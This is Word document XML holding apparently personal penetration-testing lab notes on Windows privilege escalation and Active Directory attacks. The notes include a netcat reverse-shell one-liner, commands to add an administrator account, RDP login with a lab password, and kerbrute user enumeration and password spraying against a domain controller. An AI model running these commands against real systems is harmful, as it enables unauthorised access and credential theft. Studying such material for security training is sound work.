    <w:p w14:paraId="2745FF19" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>MD5 hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435827C4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>obtain a shell running as the SYSTEM user, or an administrator account running with high privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FA6132" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">add account </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> log in over RDP, telnet, winexe, psexec, WinRM, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6F9095" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120A80AB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:MACHINE_IP /u:Administrator /p:'TryH4ckM3!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F6E01C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>syntax – net user &lt;username&gt; &lt;password&gt; /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150070A9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>or net localgroup administrators &lt;username&gt; /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEEB8BE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Example Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D323772" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>nc &lt;LOCAL-IP&gt; &lt;PORT&gt; -e /bin/bash – send reverse shell back to a waiting listener in attacker (Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A861C3C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Payload All The Things</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04484F32" w14:textId="312833BF" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="268B53FA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Attacktive Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A215950" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>nmap scan IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6C3471" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>nmap -Pn &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E24BFD8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>nmap -A &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E0B7C8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F7463A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>139 – netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464DFF5A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>445 – Microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394A0932" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>53 – DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684F9369" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>135 – SMB/RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD71197" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>RDP into DC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CA9DA8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>3389 - sometimes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600EFAAA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Certain ports being present indicate Domain Controller is present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B33449" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>88 – Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE996E8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>389 – LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4F1992" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>636 – LDAPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B94E755" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>enum4linux to enumerate ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7B73EF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">or smbclient -L </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\\\&lt;ip&gt;\\</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D1B5950" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>check for shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3E2277" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>TLD (top level domain) for Active Directory Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BCDEE3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>.local, .org, .com, .net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBF7206" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Installing Kerbrute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E861591" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Having ID’d Kerberos – 88</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F616CB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>brute force discovery of users, passwords, and password spray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D54FA7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>not recommended to brute force credentials due to account lockout policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495D6E58" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>userenum - enumeration of valid usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205EF40C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>bruteuser – bruteforce a single users password from a wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C52E2C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>bruteforce – read username:password combos from a file or stdin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28894892" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>passwordspray – test a single password against a list of users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B1C2CF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>must specify domain (-d) or domain controller (- -dc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8B5AC2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>- -safe option prevents account lockouts if encountered once</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2025C355" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>in directory where files are located that possess usernames and passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C35B49" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>kerbrute userenum -d &lt;domain&gt; - -dc &lt;ip address&gt; &lt;username file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5891DD54" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ex. ./kerbrute userenum --dc 10.10.77.160 -d spookysec.local userlist.txt -t 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE4C93D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>look for important usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A090E50" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2876F54C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>backups</w:t>
      </w:r>
    </w:p>
